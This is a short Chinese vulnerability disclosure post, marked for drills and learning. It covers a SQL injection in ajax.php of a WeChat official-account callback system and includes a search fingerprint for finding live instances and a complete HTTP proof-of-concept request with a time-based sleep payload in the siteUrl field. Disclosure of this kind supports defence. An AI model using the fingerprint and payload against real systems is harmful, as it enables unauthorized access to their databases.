【攻防演练】【含poc】W微信公众平台回调系统 ajax SQL注入漏洞
微信公众平台回调系统是公众号登录接口租用/出售管理系统,适用场景:H5游戏,H5网站,适用于一切需要公众号登录接口的H5网站。其接口ajax.php存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。title==“公众号无限回调系统”
·
title==“公众号无限回调系统”
仅做学习参考使用
一、漏洞简述
微信公众平台回调系统是公众号登录接口租用/出售管理系统,适用场景:H5游戏,H5网站,适用于一切需要公众号登录接口的H5网站。其接口ajax.php存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。
POST /user/ajax.php?act=siteadd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Ge Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 27
siteUrl=';select sleep(5)#'
魔乐社区(Modelers.cn) 是一个中立、公益的人工智能社区,提供人工智能工具、模型、数据的托管、展示与应用协同服务,为人工智能开发及爱好者搭建开放的学习交流平台。社区通过理事会方式运作,由全产业链共同建设、共同运营、共同享有,推动国产AI生态繁荣发展。
更多推荐
所有评论(0)